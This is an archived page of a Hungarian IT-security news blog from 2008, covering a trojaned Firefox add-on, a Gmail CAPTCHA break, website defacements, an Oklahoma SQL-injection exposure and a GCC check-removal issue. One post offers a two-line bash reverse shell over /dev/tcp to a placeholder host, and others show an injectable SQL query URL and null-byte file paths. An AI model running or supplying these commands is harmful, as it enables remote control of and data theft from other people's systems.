Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Megbízol a Firefox kiterjesztéseidben?

2008.05.09. 10:33 | buherator | Szólj hozzá!

Remélhetőleg nem. Az alaptalan bizalom kockázatát jól szemlélteti a annak a vietnámi nyelvi kiterjesztésnek az esete, ami február óta figyelt a Mozilla hivatalos kiegészítéseket tartalmazó oldalán, egy ismert trójai programmal megspékelve. A cég minden feltöltött fájlt vírusellenőrzésnek vet alá, de a szóban forgó, Xorer nevű kártevő lenyomata az ellenőrzés pillanatában még nem szerepelt az antivírus adatbázisában. A Mozilla ígérete szerint ezen túl minden új vírusminta beérkezésekor az összes kiszolgált add-ont újra fogják ellenőrizni.
Érdekes körülmény, hogy a nyelvi kitrejesztés feltöltője nem direkt fertőzte meg a megosztott állományt, hanem ő is a Xorer trójai egyik áldozata volt. A kártevő a fejlesztő számítógépén található összes HTML állományba befészkelte magát, és így került be a kiterjesztés súgórendszerébe.

Címkék: firefox trojan xorer

Hackerek a Házban

2008.05.06. 12:43 | buherator | 7 komment

A GNUCITIZEN stábja közösségi oldalt indított hackerek számára. A House of Hackers célja a hacker közösség összefogásán túl az is, hogy a tehetséges tagok számára karrierük építésében, a biztonsági szakemberek után kutató cégeknek pedig a megfelelő munkaerő megtalálásában segédkezzen.
A portál a Ning közösségi oldal gyár keretein belül működik, ahol már több hasonló kezdeményezés született, melyek gyakorlatilag mind a süllyesztőben végezték. A kezdeményezés mögött álló elismert szakemberek, és az erős médiavisszhang hatására most azonban úgy tűnik, hogy az oldal életképes lesz: fél nappal az indulás után már több mint 150 regisztrált taggal büszkélkedhet.
Ez azonban nem garantálja a sikert: HD Moore, a Metasploit keretrendszer megalkotója szkeptikus az oldallal kapcsolatban, mivel az jó terepül szolgálhat a fekete kalaposoknak és az őket alkalmazni kívánó bűnözői csoportoknak, ez pedig alááshatja az IT-biztonsági szakma hírnevét. A HoH támogatói ugyanakkor úgy gondolják, hogy a közösség képes lesz az önszabályozásra, és kiveti magából a nem kívánatos egyéneket.
Én optimista vagyok, és nem hiszem, hogy egy ilyen fiatal kezdeményezéssel kapcsolatban érdemes jóslatokba bocsátkozni, úgyhogy - bár nem vagyok a közösségi oldalak nagy rajongója - már regisztráltam magam a rendszerbe. Szerintem tegyetek így ti is, és kezdjünk el közösen munkálkodni azon, hogy valami jó süljön ki a dologból!

Frissítés: Megalakítottam a magyak hackerek csoportját, várok mindenkit szeretettel :)

Frissítés2: Ronald ebben a pillanatban talált egy csini perzisztens XSS-t a Ning motorban, a CSS moz-binding-eken keresztül...

Címkék: közösség kultúra house of hackers

Biztonságtechnikai Programozó Verseny

2008.05.05. 14:10 | buherator | 8 komment

Május 10-én 18:00 órától, az ELTE IK hallgatói önkormányzatának szervezésében kerül megrendezésre egy biztonságtechnikai programozó verseny az ELTE legnagyobb géptermében, a Lovardában. A megmérettetésre bármelyik egyetem nappali tagozatos hallgatója jelentkezhet, leginkább online, de lehet hogy lesz lehetőség helyszíni regisztrációra is. További információt itt találtok.

Címkék: programozás elte biztonságtechnikai programozó verseny

Gmail audio-CAPTCHA

2008.05.02. 15:00 | buherator | 8 komment

Hát persze hogy ezt is megtörték... A WinterCore Labs emberének a következő, egyszerű de mégis zseniális ötlete támadt: Az emberek elsősorban a látásukra és nem a hallásukra hagyatkozó lények, legtöbbünk számára sokkal könnyebb feladat megtalálni valakit egy zsúfolt helyen, mint meghallani egy hamis hangot egy koncerten. A hangos CAPTCHA-kat ennek ellenére meg tudjuk fejteni, tehát elképzelhető, hogy ezekkel a tesztekkel az általunk írt programoknak könnyebb dolguk lesz!
És valóban, a közzé tett eljárás alapján a Gmailben használt audio-CAPTCHA-k egyszerű Fourier-traszformációval és néhány statisztikai módszerrel 90%-os hatékonysággal megfejthetők! A Google Turing-tesztje egyébként jó pár sebből vérzett: csak számjegyeket kellett felismerni, mindig ugyanaz a hang olvasta be  a megfelelő jegyeket, a szöveg elejét és végét könnyen felismerhető "puttyogás" jelezte, tehát valószínűleg még lehet finomítani a  technikán.

A törés pontos algoritmusát a felfedezők érthető okokból nem kívánják niylvánosságra hozni, de egy kis demonstrációs videó megnézhető itt.

Kicsit más téma: A Microsoft egy új tesztelési eljáráson dolgozik, melynek lényege, hogy háziállatokról készült képek közül kell kiválasztanunk a kutyákat illetve macskákat ábrázolókat. Cukiság rajongóknak mindenképpen érdemes vetniük egy pillantást az ASIRRA projekt oldalára!


Címkék: gmail captcha asirra

Szabad Európa Rádió DDoS

2008.05.02. 13:31 | buherator | 1 komment

Április 26-án, a csernobili atomkatasztrófa 22. évfordulóján nagyszabású elosztott támadást indítottak a Szabad Európa Rádió rendszerei ellen. Az eddigi adatok szerint Koszovóból, Oroszországból és Azerbajdzsánból másodpercenként kb. 50.000 kérés futott be a rádió különböző online állomásaihoz, melyek közül nyolc meg is adta magát.
A támadás kiváltó oka valószínűleg az, hogy a Sz.E.R. tüntetéseket szervezett az alacsony kárpótlási összegek és az ukrán kormány legújabb nukleáris reaktor létesítésére irányuló tervei elleni tiltakozásul.

Címkék: incidens ddos szabad európa rádió

Magyar áldozatok

2008.04.30. 14:41 | buherator | 2 komment

Az Anyádat blog szerint férget ültettek a CinemaCity weboldalába, egy kommentező pedig azt írja, hogy a West-Balkán oldalát is betalálták (és tényleg). Utóbbi alatt láthatóan egy WordPress ketyeg, amire pont most jött ki egy csini kis süthamisítást lehetővé tévő hiba. A CinemaCityben is valami hasonló turpisság lehet, de az is elképzelhető hogy mass-"deface"-ről van szó.

Címkék: incidens worm wordpress west balkan cinemacity

Vihar a biliben?

2008.04.29. 22:45 | buherator | 9 komment

Tegnapelőtt pár órán át elérhetetlen volt az Index, a Blog.hu, valamint a FreeWeb. Az első két oldal kiesése nem ért meglepetésként: a Blog.hu már rég óta hírdeti, hogy erőforráshiánnyal küzdenek, gondoltam éppen az új vasat szerelik. Aztán hallom innen meg onnan, hogy a Freeweb is ki van dőlve, meg hogy Monty Python idézetek voltak láthatóak néhány percig(?) az Indexes címekben, a blog.hu címoldala meg még mindig light módban fut. Azt tudjuk, hogy az indexesek vicces srácok, néha tréfarépát reggeliznek és jól megviccelik a népet. Viszont arra is volt már példa, hogy nem a hírportálos szakik szabták meg a szájt küllemét (az sem én voltam!), bár ez csak viszonylag keveseknek esett le - az akkori eljárás egyébként nagyon hasonlított a mostanira...
Szóval az a lényeg, hogy eléggé piszkálja a csőrömet, hogy megfelelően kiterjedtnek hitt kapcsolatrendszerem dacára gőzöm sincs hogy mi történt, ezért szívesen venném, ha bárki, akinek kézzel fogható/hitelesnek tekinthető infója van a történtekről hagyna itt egy kommentet, vagy ha nem akarja világ orrára kötni a dolgot, akkor legalább nekem küldene egy e-mailt :) Előre is köszi!

Címkék: index blog hu

Totális Windows-hacker kütyü, egyenesen a Microsofttól!

2008.04.29. 22:02 | buherator | 3 komment

Persze kizárólag a bűnüldüző szervek számára. A Microsoft csendben Új-Zélandtól Lengyelországig szétosztott több mint kétezer, COFEE (Computer Online Forensic Evidence Extractor) névre keresztelt USB kütyüt, amely 150 parancsot speciális parancs kiadására alkalmas, melyek "redikálisan lecsökkentik" a Windowst futtató gépeken tárolt bizonyítékok kinyerési idejét. A nyilvánosságra került információk szerint csak bedugja a rendőrbácsi a kis kulcsot a berregő gépbe, és máris elkezdheti monitorozni a hálózati forgalmat, megvizsgálhatja a merevlemezek tartalmát, vagy nekiállhat megfejteni a jelszavakat. A (valószínűleg hivatalos közleményeken alapuló) híradások szerint az eszköz nem tartalmaz semmi olyan módszert, ami túlmegy a nyilvánosság által is ismert lehetőségeken, de én azért azt hiszem, nagyon vigyorognék, ha a kezeim  közé kaparinthatnék egy ilyet :)

A Microsoft célja egyébként az, hogy egy egységes, könnyen oktatható és alkalmazható eszköt adjon a hatóságok kezébe az új évezred bűncselekményeinek felderítésére.

Címkék: microsoft privacy cofee

Izraeli Bank deface

2008.04.28. 19:24 | buherator | Szólj hozzá!

Csütörtökön, a zsidó húsvétkor esedékes szabadságokat kihasználva muszlim hackerek deface-elték az Izraeli Bank honlapját. Az oldalon Jeruzsálem felszabadítását hírdető szöveget és egy maszkot viselő, Kalashnikovokat hordó iszlamista harcosok vonulását bemutató YouTube videó linkjét helyezte el a magát "The Moorish"-nak nevező támadó. Az időpont megválasztása egyébként tökéletes volt: a bankot a sajtónak kellett értesíteni az incidensről, a portál pedig napokon keresztül elérhetetlen volt, mivel az IT részleg a rengeteg hiányzó munkaerő miatt úgy döntött, hogy a biztonság kedvéért inkább az egész rendszert lehúzzák az internetről.
A betörés által okozott károkat elemző vizsgálat még tart, de a hivatalos közlemény szerint az eset - ahogy ez egy banki rendszernél el is várható - a kritikus rendszertől szeparáltan történt, érzékeny adatokat nem érintett.

Címkék: hírek incidens deface bank of israel

A Microsoft nem üldözi a hackereket

2008.04.24. 14:01 | buherator | 8 komment

Bár elvileg már tavaly július óta ez a bevett eljárás, most már teljesen hivatalossá vált: a Microsoft online rendszereiben hibát kereső biztonsági szakártőknek, hackereknek nem kell tevékenységük jogi következményeitől tartaniuk, a cég ugyanis nem tesz feljelentést senki ellen, aki hibát talál a rendszerükben és erről az illetékeseket megfelelően tájékoztatja. A Microsoft elimseri ezen az emberek munkájának fontosságát, igyekszik a bejelentésekre a lehető leghamarabb reagálni és köszönetet mond minden egyes bejelentett hibáért.
Reméljük, hogy az óriásvállalat viselkedése példaként fog szolgálni más intézmények számára is!

Címkék: microsoft

Meghackelték Obamát

2008.04.24. 13:40 | buherator | 1 komment

Az Egyesült Államok Demokrata Pártjának egyik elnökjelöltjének, Barack Obamának weboldalára egy magát III. Liverpooli Moxnak nevező illető olyan kódot juttatott, amely a látogatókat a jelölt párton belüli riválisának, Hillary Clintonnak az oldalára irányította. A támadást az Obama oldalán elérhető közösségi blogszolgáltatásban található hiba tette lehetővé, melnyek kihasználásával perzisztens XSS-et lehetett végrehajtani.
Az eset így is okozott ugyan némi bosszúságot, a támadás ereje azonban a ma jellemző, tömeges fertőzéseket és személyiséglopásokat eredményező akciókhoz képest kifejezetten enyhe volt. Mox minden további nélkül ellophatta volna az oldalra látogatók munkamenet azonosítóit és elkezdhetett volna játszadozni pl. a kampánytámogatásokkal,  de a hiba kihasználásának lehetőségei már-már megszámlálhatatlanok. Reméljük, hogy a hasonló oldalak üzemeltetői tanultak valamit az esetből (nem úgy mint az ENSZ), és nem teszik ki felhasználóikat hasonló veszélyeknek!

Címkék: politika incidens xss

Hazai termék az Openwallon

2008.04.23. 15:06 | buherator | 1 komment

Kikerült az openwall.com-ra Bucsay Balázs és Kasza Péter gyorsított MySQL foltja a John the Ripperhez, valamint az újítás bekerült a jumbopatch-be is, így Sun-Zero-val együtt már három hazánkfia jeleskedik mindannyiunk kedvenc jelszótörőjének hivatalos fejlesztésében :)

Címkék: mysql john the ripper magyar betyár

Egyesült Fertőző Nemzetek

2008.04.23. 14:41 | buherator | 2 komment

Nagyjából egy fél éve érte deface támadás az Egyesült Nemzetek weboldalát. A támadók akkor egy SQL injection hibát kihasználva háborúellenes üzenetet helyeztek el a szervezet oldalain. Az incidenst követően az érintettek ahelyett, hogy betömték volna a tátongó lyukakat, mindenféle amatőr módszerekkel próbálták a tüzet oltani.
A helyzet a mai napig nem változott: az un.org is áldozatul esett a január óta tartó injektálási hullámnak, melynek során a támadók észrevétlenül kártékony JavaScript kódokat helyeznek el leginkább ASP alapú weboldalakon. Ez úgy látszik nem nagyon zavarja az illetékeseket, a hoszt jelenleg is veszélyes kódokat tartalmaz (látogatásuk legfeljebb NoScripttel ajánlott), az ASP oldalak pedig még mindig sebezhetők!

Egy egyszerű Google kereséssel a fertőzés útja jól nyomonkövetkető: jelenleg kb. 250-300.000 fertőzött oldal szerepel a kereső adatbázisában.

Frissítés: itt van egy viszonylag részletes elemzés a kiszolgált kártékony elemekről.

Címkék: incidens sql injection

QuickTime kódfuttatás

2008.04.23. 09:14 | buherator | Szólj hozzá!

Petko Petkov újabb súlyos hibát fedezett fel a QuickTime legfrissebb változatában. A sebezhetőség .mov videók segítségével használható ki, melyet lefuttatva elvileg tetszőleges kód futtatható (az eredeti cikk nem jellemzi ilyen szempontból a rést, az író állítása szerint a megfelelő PoC fájlt futtatva elindult a Windows számológép illetve rajzoló alkalmazása). A hiba kihasználásával gond nélkül komprommitálhatók Windows XP-t és Vistát futtató számítógépek is.
pdp az Egyesült Királyságban érvényes szabályozás miatt egyelőre nem tudja milyen formában tájékoztathatná az Apple-t a problémáról, valószínűleg valamelyik "sebezhetőség bróker", pl. az iDefense vagy a VeriSign lesz a segítségére. Mi addig is vigyázzunk a megbízhatatlan forrásból származó .mov-okkal!

Címkék: bug quicktime 0day

Hacktivity jegyelővétel

2008.04.22. 19:46 | buherator | 2 komment

Holnaptól lehet elővételes jegyeket váltani Hacktivityre, valamint kikerültek a hivatalos honlapra a konf témakörei is (bár ennek információértékét én nem látom...). Az árak a következők:

Április 23. - Június 30.: 4000 Ft
Július 1. - Szeptember 15.: 6000 Ft
Helyszínen: 8000 Ft

Érdemes teháta kisnaptárba beírni az időpontot (szeptember 20-21), és megváltani a jegyet jó hamar.

Címkék: hacktivity

Hétfői Safari

2008.04.21. 12:14 | buherator | Szólj hozzá!

Az Apple kiadta a javítást ahhoz a Safari sebezhetőséghez, amely a CanSecWest Pwn2Own versenyén a MacBook Air vesztét okozta. A javítócsomag összesen négy folt található, melyek közül kettő csak a Windowsos verziókat, a másik kettő viszont a Windowsra és OS X-re készült változatokat is érintik. Előbbiek a Juan Pablo Lopez Yacubian által már korábban nyilvánosságra hozott címsorhamisítást, DoS-t illetve kódfuttatást lehetővé tevő sebezhetőségek. Az OS X-et is érintő hibák közül az egyik XSS-t tesz lehetővé a hosztnévbe illesztett kettőspontok segítségével, a másik pedig egy, a JavaScript reguláris kifejezésének értelmezésében megbúvó heap overflow, amely szintén DoS-hoz és kártékony kódfuttatáshoz vezethet - ez a hiba lett egyébként az Air végezte.

PoC kódot a nevezetes sebezhetőséghez egyelőre nem találtam, de az experteknek tudom ajánlani ezt a papírt az automatizált patch alapú exploitírásról :)

A hibasornak azonban itt nincs vége: Ronald nem rég talált egy null-byte alapú érdekességet a böngésző Windowsos változatában:

file:///C:/WINDOWS/explorer.exe%00.html
file:///C:/WINDOWS/system.ini%00.txt
file:///C:/WINDOWS/explorer.exe%00.wmv
Ezekre elvielg nem szól a javítás...

Címkék: windows safari bug os x pwn to own

Vasárnapi átszellemülés

2008.04.20. 12:46 | buherator | 3 komment

"roses are #FF0000
violets are #0000FF
and all my base
are belong to you"


Masszívan tavasz van, az égen úszó felhők száma a nullához konvergál, a madarak csivitelnek, szóval tessék elhagyni a monitor és a klaviatúra biztos menedékét! Tekerjetek egyet, vagy parkosítsátok be Budapestet, közben meg gyönyörködjetek a mindenfelé burjánzó természet alkotta fraktálokban!

Útravalóul pedig hamuban sült pogácsa helyett fogadjátok ezt a tisztán bash alapú reverse-shellt, ami megjelent itt meg itt is:

$ exec 5<>/dev/tcp/tehosztod.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

(Csak -enable-net-redirections flaggel forgatott bash-el működik. Debianon/Ubuntun alapjáraton nem, viszont Solarison állítólag igen!)

Címkék: tavasz bash

Újabb ActiveX sebezhetőség

2008.04.18. 17:58 | buherator | Szólj hozzá!

Mióta az eszemet tudom, értelmes célra ActiveX vezérlőt még nem használtam, ellenben elég sokáig tartana összeszedni azoknak a kártevőnek a listáját, melyek ezeket a beépülő bughalmazokat használják táptalajul.
A Bugtraq listára tegnap egy új, a Microsoft Worksszel érkező WkImgSrv.dll-ben található hibáról érkezett jelentés. A beküldött PoC XP SP2-n futó IE7-tel tesztelve "csak" rendszerösszeomlást okoz, azonban McAffee csapata már kódfuttatásra alkalmas exploitokat is talált.
A böngészők az ActiveX tartalmakat potenciálisan veszélyesnek tekintik, ezért a felhasználó beleegyezését kérik azok futtatásához, ami ugyan mérségli a hiba súlyosságát, azonban semmit nem garantál.
Folt még nincs, de a 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 ClassId-ra beállított KillBittel hatékonyan letilthatók a veszélyes hívások.

A Heise-Online cikke alapján.

Gyors frissítés: Windows frontról ezen kívűl egy szintén vadiúj, helyi jogosultságkiterjesztésre alkalmas hibáról is érkezett hír, a részleteket azonban a MS egyelőre titokban tartja. Azt minden esetre lehet tudni, hogy a sebezhetőség az XP SP2-t, Server 2008-at, és a Vistát is érinti.

Címkék: windows bug activex works

:O

2008.04.18. 15:35 | buherator | 5 komment

Sokáig gondolkoztam, hogy mi legyen a bejegyzés címe, de mivel egyszerűen képtelen voltam szavakkal leírni ami a fejemben járt, úgy döntöttem, hogy inkább megpróbálom megjeleníteni azt, hogy milyen arcot vágtam mikor az alábbi történetet olvastam:

Oklahoma állam büntetésvégrehajtási rendszerének adatai egészen a közelmúltig SQL injection segítségével bárki számára hozzáférhetőek voltak. Legalább három éve. Ez bár durva, de még mindig nem túl megdöbbentő. Az viszont, hogy a hibás szkript ilyen formában várta a paramétereket:


http://docapp8.doc.state.ok.us/pls/portal30/url/page/sor_roster?sqlString=select distinct o.offender_id,doc_number,o.social_security_number,o.date_of_birth,o.first_name,o.middle_name,o.last_name,o.sir_name,sor_data.getCD(race) race,sor_data.getCD(sex) sex,l.address1 address,l.city,l.state stateid,l.zip,l.county,sor_data.getCD(l.state) state,l.country countryid,sor_data.getCD(l.country) country,decode(habitual,'Y','habitual','') habitual,decode(aggravated,'Y','aggravated','') aggravated,l.status,x.status,x.registration_date,x.end_registration_date,l.jurisdiction from registration_offender_xref x, sor_last_locn_v lastLocn, sor_offender o, sor_location l , (select distinct offender_id from sor_location where status = 'Verified' and upper(zip) = '73064' ) h where lastLocn.offender_id(%2B) = o.offender_id and l.location_id(%2B) = lastLocn.location_id and x.offender_id = o.offender_id and x.status not in ('Merged') and x.REG_TYPE_ID = 1 and nvl(x.admin_validated,to_date(1,'J')) >= nvl(x.entry_date,to_date(1,'J')) and x.status = 'Active' and x.status <> 'Deleted' and h.offender_id = o.offender_id order by o.last_name,o.first_name,o.middle_name&sr=yes


nálam egy hangyányit kiverte a biztosítékot... Percekig bámultam tátott szájjal a képernyőt, és csodáltam az emberi hülyeség eme nagyszerű manifesztációját. A lekérdezés módosításával 10.579 szexuális bűnöző, nyilvánosan meztelenkedő fiatalkorú, és  közterületen vizelő gazember 7MB-nyi bizalmas adatát érhettük el, vagy akár fel is vehettük közéjük a szomszédot, aki vasárnap reggel túl hangosan nyírja a füvet. Ha kicsit tovább játszottunk a paraméterekkel, az összes nyilvántartásba vett bűnelkövető adatait lekérdezhettük és módosíthattuk.
Alex Papadimoulis (az eredeti cikk szerzője), akit egy AJ nevű olvasó értesített a hibáról persze kapcsolatba lépett a hivatallal, akik ígéretet tettek, hogy javítják a hibát. Nem sokkal később ez előzőleg gyártott, speciális kérések valóban csődöt mondtak, a programozók ugyanis elkezdték szűrni a kérésekben szereplő olyan karakterláncokat, melyek bizalmas információkra vonatkoznak. Így pl. a "social_security_number"-t (társadalombiztosítási szám) tartalmazó kérések nem futottak le. A "Social_security_number"-t tartalmazók viszont igen...
Papadimoulis ekkor egy újabb bejelentést tett, melyben kifejtette, hogy a hibás szkript segítségével akár a nyilántartásba vettek orvosi adatai is lekérdezhetőek. Ez már megtette a hatását: a hibás alkalmazást eltávolították az oldalról (ahol mellesleg egy, a parlament.hu-éhoz hasonló PL/SQL gyönyörűség fut ;). Ez azonban nem rendített meg abban a hitemben, hogy Oklahomában homoki sügérekkel programoztatnak.


Címkék: sql injection

Oracle patchnap

2008.04.17. 10:53 | buherator | Szólj hozzá!

Az Oracle 41 biztonsági hiányosságra adott ki foltot tegnap, a Critical Patch Update keretében.  A hibák az Oracle Database Server, Oracle Application Express, Oracle Application Server, Oracle E-Business Suite, Oracle Enterprise Manager, and Oracle PeopleSoft Enterprise és első alkalommal az Oracle Siebel CRM Applications termékeket érintik.

A sebezhetőségek közül 15 használható ki távolról, autentikáció nélkül, ezek közül egy érinti az adatbázisszervert, de a 11g-t már nem. Ez a hiba - bár az Oracle nem árult el részleteket - Alexander Kornbrust adatbázisspecialista szerint egy jelszó-visszaállítási probléma, melynek eredménye, hogy a rendszer néha visszaállítja az OUTLN felhasználó jelszavát OUTLN-re, és DBA jogokat ad neki (lol?).

A Heise-Online cikke alapján.

Címkék: hírek bug oracle

Csak erős idegzetűeknek: extrém Flash exploit

2008.04.16. 22:50 | buherator | 1 komment

Miközben a feedjeimen rágtam át magam feltűnt, hogy többen hanyattdobták magukat Mark Dowd 25 oldalon kifejtett Flash-támadási módszerétől, de részletesebben utánajárni a dolognak nem volt időm. Aztán hazafelé döcögve már alig vártam hogy beleássam magam a leírásba, hazaérvén tehát az első dolgom volt elővenni a PDF-olvasómat és nekiállni az írásnak. Azt már az első néhány oldal után láttam, hogy nem fogom a fordítással megkönnyíteni a dolgotokat, főként terjedelmi okok miatt, de azt azért mindenképpen szerettem volna, hogy mindenki lássa milyen az, amikor a hackelést már művészi szinten űzik.
Úgy döntöttem tehát, hogy Thomas Ptacek (egyébként rendkívül szórakoztató) összefoglalóját fogom számotokra magyarítani, mivel ez tömören, ugyanakkor elegendő mélysében tárja elénk a módszer lényegét. A teljes leírás végéig még én sem jutottam el, a tervem az, hogy a fordítással párhuzamosan próbálom a rendes anyagot is emészteni. Most csütörtök éjjel van, már eléggé fáradt vagyok, kíváncsi vagyok mikorra végzek! Csapjunk tehát a lecsóba, innentől kössétek fel gatyát:

Címkék: flash bug hardcore skynet super mario brothers

Google XSS - avagy az elhanyagolt Content-type esete

2008.04.16. 09:10 | buherator | Szólj hozzá!

Billy Rios újabb trükköt fedezett fel a Google egyik webes alkalmazásában, ezúttal a Spreadsheets volt az "áldozat". Mivel a Google által beállított munkamenet azonosítók az egész google.com domainre érvényesek, a hiba kihasználsával az összes G-betűs szolgáltatás - pl. a Gmail, Google Docs és Code stb. - hozzáférhetővé válik.
A probléma gyökere a böngészők Content-type fejlécekkel kapcsolatos viselkedésében keresendő: Az összes jelentősebb ilyen alkalmazás ugyanis bizonyos esetekben figyelmen kívül hagyja a HTTP válaszban érkezett fejlécet, és a saját feje után menve igyekszik eldönteni, hogy milyen típusú adathalmaz érkezik a túloldalról. Ennek a lehetőségnek a kihasználásához elég létrehoznunk egy új táblázatot, melynek első mezőjébe tetszőleges HTML kódot írhatunk, majd az elkészült dokumentumot megoszthatjuk CSV-ként. Ezek után, ha valaki szeretné megnyitni a fájlt (melynek típusa text/plain, tehát egyszerű szöveg kellene hogy legyen), a böngésző - ebben az esetben az Internet Explorer  - továbblépve a Content-type-on beleütközik az általunk létrehozott HTML kódba, aminek nagyon megörül, és elkezdi az érkező adatokat HTML-ként renderelni. Mivel a kódunk a google.com tartományban fut, hozzáférhetünk a kedves felhasználó összes ide tartozó azonosítójához, belenézhetünk a Gmailes postaládájába, hátsó kapukat helyezhetünk el a kódjaiban, vagy átböngészhetjük a naptárának bejegyzéseit, de a lehetőségek szinte korlátlanok (ezért kell vigyázni ilyen szolgáltatók estén a szokásosnál is jobban az XSS-ekkel).

Egyszerű, de hatékony módszer, kár hogy már javították ;)  Nem árt azért elolvasni Blake Frantz "Flirting with MIMe types" című írását, hogy mi magunk ne essünk bele abba a hibába, amibe a Google szorgos programozói igen.

Címkék: google programozás xss

A GCC optimalizáció biztonsági ellenőrzéseket távolíthat el

2008.04.12. 10:36 | buherator | Szólj hozzá!

Az US-CERT jelentése szerint a GNU Compiler Collection 4.2-es és annál újabb verziói optimalizációs szempontok alapján eltávolíthatnak bizonyos fontos biztonsági ellenőrzéseket a fordított kódból. A problémára már 2006 áprilisában felhívta a figyelmet Felix von Leitner, aki már a 4.1-es verzióknál is tapasztalta a problémát. A GCC fejlesztők ki is adtak egy foltot, azonban ez úgy tűnik nem orvosolta siekresen a problémát. Miről is van szó? A

char* buf;
int len;

adattípusokat tartalmazó műveletek esetén a fordító feltételezi, hogy a buf és a len összege mindig nagyobb buf-nál, így az ehhez hasonló pointer-aritmetikán alapuló ellenőrzéseket:

if (buf+len<len){...}

a függvényblokkal ({...} - ennek is van ennél szebb magyar neve...) együtt egyszerűen kiszűri, holott egy integer túlcsordulás esetén az ellenőrzésnek nagyon is meg kéne lennie! Ez természetesen puffer túlcsordulásos támadásokhoz vezethet azon programok esetén, melyeket ilyen GCC-vel fordítottak. Fontos megjegyezni, hogy a fordító alapvetően nem hibás, hiszen ezt a viselkedést az ISO/IEC 9899:1999 jelű C szabvány megengedi.
A CERT Biztonságos C programozási szabályzat azt javasolja, hogy a hasonló programrészek esetén kasztoljunk uintptr_t típusra (stdint.h), illetve size_t-re, ha az adott platfomron az előző típus nem elérhető:

#include <stdint.h>

[...]
if((uintptr_t)buf+len < (uintptr_t)buf)
   [...]

Itthon futólag tesztelgettem a dolgot (gcc 4.2.1), és ez a megoldás nálam nem működött, de kíváncsian várom az esetleges ellentétes tapasztalatokat!


Címkék: programozás gcc buffer overflow

Hogyan jósolható meg a DNS tranzakciós ID?

2008.04.10. 10:32 | buherator | Szólj hozzá!

Kedden kijött a Microsoft rendszeres frissítőcsomagja, amely több kritikus és kavésbé súlyos hibát javít. Az egyik ilyen javított hibajegy az MS08-020, melyről kedvenc MS blogom, a Security Vulnerability Research & Defense kimerítő értekezést készített.

Címkék: windows bug dns kriptográfia spoofing

Inda phishing?

2008.04.10. 09:39 | buherator | 3 komment

Miközben a backenden prüntyögtem, megjelent egy új doboz, amely a következő szöveget tartalmazza:

Az Indapass jelszólopások elkerüléséről · Bővebben!  »

A Bővebbenre kattintva a Gépház blogjába jutunk, ahol leírják, hogy leleményes gazfickók megpróbálják leadathalászni a szegény, védtelen Inda júzerek belépési adatiat. Az akciónak minden bizonnyal elsznek áldozatai, úgyhogy lehet, hogy beizzítok egy CAPTCHA-t a regisztrált felhasználók kommentjeihez is, a kényelmetlenségért előre is elnézést kérek!

Vigyázzatok magatokra, ne dőljetek be minden olcsó trükknek!

Címkék: inda phishing

süti beállítások módosítása